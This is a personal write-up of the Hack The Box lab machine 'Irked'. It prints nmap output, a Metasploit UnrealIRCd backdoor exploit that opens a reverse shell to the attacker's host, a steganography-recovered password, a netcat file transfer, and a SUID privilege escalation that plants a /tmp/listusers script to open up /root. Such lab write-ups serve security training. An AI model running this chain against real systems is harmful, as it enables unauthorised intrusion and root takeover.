Irked
As always I start with a port scan to get a list of open ports and running services:
# Nmap 7.70 scan initiated Sun Nov 18 20:40:15 2018 as: nmap -v -n -T4 -sS -sV -sC -oN nmap.scan -p- 10.10.10.117 Nmap scan report for 10.10.10.117 Host is up (0.029s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 40080/udp status |_ 100024 1 47737/tcp status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 47737/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Nov 18 20:41:48 2018 -- 1 IP address (1 host up) scanned in 92.87 seconds
Some information about the running webserver:
HTTP/1.1 200 OK Date: Sun, 18 Nov 2018 20:00:42 GMT Server: Apache/2.4.10 (Debian) Last-Modified: Mon, 14 May 2018 18:00:02 GMT ETag: "48-56c2e413aa86b" Accept-Ranges: bytes Content-Length: 72 Vary: Accept-Encoding Content-Type: text/html
The browser can’t load the website, but cURL gives some information:
root@n0w4n:~/htb/irked# curl -vv 10.10.10.117 * Rebuilt URL to: 10.10.10.117/ * Trying 10.10.10.117... * TCP_NODELAY set * Connected to 10.10.10.117 (10.10.10.117) port 80 (#0) > GET / HTTP/1.1 > Host: 10.10.10.117 > User-Agent: curl/7.61.0 > Accept: */* > < HTTP/1.1 200 OK < Date: Sun, 18 Nov 2018 20:02:29 GMT < Server: Apache/2.4.10 (Debian) < Last-Modified: Mon, 14 May 2018 18:00:02 GMT < ETag: "48-56c2e413aa86b" < Accept-Ranges: bytes < Content-Length: 72 < Vary: Accept-Encoding < Content-Type: text/html < <img src=irked.jpg> <br> <b><center>IRC is almost working!</b></center> * Connection #0 to host 10.10.10.117 left intact
There is a old backdoor exploit for UnrealIRC which can be exploited by metasploit.
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117 rhost => 10.10.10.117 msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697 rport => 6697 msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.8 lhost => 10.10.14.8 msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit [*] Started reverse TCP double handler on 10.10.14.8:4444 [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697... :irked.htb NOTICE AUTH :*** Looking up your hostname... [*] 10.10.10.117:6697 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo jREAOnEfvR5esDJE; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "jREAOnEfvR5esDJE\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:37970) at 2018-11-18 21:27:38 +0100 id uid=1001(ircd) gid=1001(ircd) groups=1001(ircd) python -c 'import pty;pty.spawn("/bin/bash");' ircd@irked:~/Unreal3.2$
And it works…..now to take a look around.
ircd@irked:/tmp/n0w4n$ uname -a uname -a Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux ircd@irked:/tmp/n0w4n$ cat /etc/*-release cat /etc/*-release PRETTY_NAME="Debian GNU/Linux 8 (jessie)" NAME="Debian GNU/Linux" VERSION_ID="8" VERSION="8 (jessie)" ID=debian HOME_URL="http://www.debian.org/" SUPPORT_URL="http://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/"
ircd@irked:~$ less .bash_hi less .bash_history WARNING: terminal is not fully functional .bash_history (press RETURN) ls cat aliases lskeys ls keys ls keys/CVS cd keys ls file CVS cd CVS ls ls Root cat Root/Root cd Root ls file Root cat Root cd / ls cd /home ls cd djmardov ls ls * Input is not a pipe (press RETURN) cd /tmp ls clear clear ls cd / ls cd /var/www/html ls cd /tmp sudo -i cd /home/ircd clear ls ls -lah cd .. ls cd djmardov ls cd Documents ls -lah cat .backup clear exit
So I did some enumeration and got not very much.
After a while I looked back at what I found and banged my head a few times against the wall for being so blind.
The hint was there for the taking……
The .backup file had some content:
Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
The mentioning about steg did me believe it had to do with steganography….but what file. Nothing I found on the system looked like it would work.
But one file did…….I missed it and feel so dumb. The picture on the main page!!!!!
root@n0w4n:~/htb/irked# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss wrote extracted data to "pass.txt". root@n0w4n:~/htb/irked# cat pass.txt Kab6h+m+bbp2J:HG
ircd@irked:/tmp$ su djmardov su djmardov Password: Kab6h+m+bbp2J:HG djmardov@irked:/tmp$ id id uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~/Documents$ cat user.txt cat user.txt 4a66a78b12dc0e661a59d3f5c0267a8e
Got user now for root.
djmardov@irked:/tmp$ nc -lp 9999 > linenum.sh
root@n0w4n:~/htb/irked# nc -w3 10.10.10.117 9999 < linenum.sh
This is a nice enumeration tool to use for a quick scan of the system.
After a long look at the report I noticed a file that normally isn’t there.
[-] SUID files: -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4 -rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec -rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount -rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount -rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
Running /usr/bin/viewuser show the following message:
djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2018-11-26 00:19 (:0) djmardov pts/0 2018-11-26 13:55 (10.10.14.8) djmardov pts/1 2018-11-26 13:47 (10.10.14.8) sh: 1: /tmp/listusers: not found
It is looking for /tmp/listusers but can’t find it. Let’s help it.
djmardov@irked:~$ ls -lah / | grep root drwxr-xr-x 21 root root 4.0K May 15 2018 . drwxr-xr-x 21 root root 4.0K May 15 2018 .. drwxr-xr-x 2 root root 4.0K May 11 2018 bin drwxr-xr-x 3 root root 4.0K May 15 2018 boot drwxr-xr-x 16 root root 3.1K Nov 26 00:19 dev drwxr-xr-x 135 root root 12K Oct 30 14:51 etc drwxr-xr-x 4 root root 4.0K May 14 2018 home lrwxrwxrwx 1 root root 33 May 15 2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae lrwxrwxrwx 1 root root 33 May 11 2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae drwxr-xr-x 18 root root 4.0K May 11 2018 lib drwx------ 2 root root 16K May 11 2018 lost+found drwxr-xr-x 3 root root 4.0K May 11 2018 media drwxr-xr-x 2 root root 4.0K May 11 2018 mnt drwxr-xr-x 2 root root 4.0K May 11 2018 opt dr-xr-xr-x 121 root root 0 Nov 26 00:18 proc drwx------ 2 root root 4.0K Nov 3 04:25 root drwxr-xr-x 22 root root 820 Nov 26 00:24 run drwxr-xr-x 2 root root 4.0K Oct 30 14:51 sbin drwxr-xr-x 2 root root 4.0K May 11 2018 srv dr-xr-xr-x 13 root root 0 Nov 26 00:18 sys drwxrwxrwt 11 root root 4.0K Nov 26 14:24 tmp drwxr-xr-x 10 root root 4.0K May 11 2018 usr drwxr-xr-x 13 root root 4.0K May 11 2018 var lrwxrwxrwx 1 root root 29 May 15 2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae lrwxrwxrwx 1 root root 29 May 11 2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae
As can be seen the /root folder is set to permission 700.
djmardov@irked:/root$ echo "chmod -R 777 /root" > /tmp/listusers && chmod 777 /tmp/listusers djmardov@irked:/root$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2018-11-26 00:19 (:0) djmardov pts/0 2018-11-26 13:55 (10.10.14.8) djmardov pts/1 2018-11-26 13:47 (10.10.14.8)
djmardov@irked:~$ ls -lah / | grep root drwxr-xr-x 21 root root 4.0K May 15 2018 . drwxr-xr-x 21 root root 4.0K May 15 2018 .. drwxr-xr-x 2 root root 4.0K May 11 2018 bin drwxr-xr-x 3 root root 4.0K May 15 2018 boot drwxr-xr-x 16 root root 3.1K Nov 26 00:19 dev drwxr-xr-x 135 root root 12K Oct 30 14:51 etc drwxr-xr-x 4 root root 4.0K May 14 2018 home lrwxrwxrwx 1 root root 33 May 15 2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae lrwxrwxrwx 1 root root 33 May 11 2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae drwxr-xr-x 18 root root 4.0K May 11 2018 lib drwx------ 2 root root 16K May 11 2018 lost+found drwxr-xr-x 3 root root 4.0K May 11 2018 media drwxr-xr-x 2 root root 4.0K May 11 2018 mnt drwxr-xr-x 2 root root 4.0K May 11 2018 opt dr-xr-xr-x 121 root root 0 Nov 26 00:18 proc drwxrwxrwx 2 root root 4.0K Nov 3 04:25 root drwxr-xr-x 22 root root 820 Nov 26 00:24 run drwxr-xr-x 2 root root 4.0K Oct 30 14:51 sbin drwxr-xr-x 2 root root 4.0K May 11 2018 srv dr-xr-xr-x 13 root root 0 Nov 26 14:25 sys drwxrwxrwt 11 root root 4.0K Nov 26 14:24 tmp drwxr-xr-x 10 root root 4.0K May 11 2018 usr drwxr-xr-x 13 root root 4.0K May 11 2018 var lrwxrwxrwx 1 root root 29 May 15 2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae lrwxrwxrwx 1 root root 29 May 11 2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae
Looks like the permission on the /root folder has changed to the better.
djmardov@irked:/root$ ls -lah total 28K drwxrwxrwx 2 root root 4.0K Nov 3 04:25 . drwxr-xr-x 21 root root 4.0K May 15 2018 .. lrwxrwxrwx 1 root root 9 Nov 3 04:25 .bash_history -> /dev/null -rwxrwxrwx 1 root root 570 Jan 31 2010 .bashrc -rwxrwxrwx 1 root root 12 Nov 3 04:43 .nano_history -rwxrwxrwx 1 root root 17 May 14 2018 pass.txt -rwxrwxrwx 1 root root 140 Nov 19 2007 .profile -rwxrwxrwx 1 root root 33 May 15 2018 root.txt djmardov@irked:/root$ cat root.txt 8d8e9e8be64654b6dccc3bff4522daf3
And there we have it. Can’t say I really like this machine and the challenge it presented.
It is more a CTF kinda machine then the regular HTB machines and for something like OSCP training I wouldn’t recommend it.
But it does show that enumeration is key.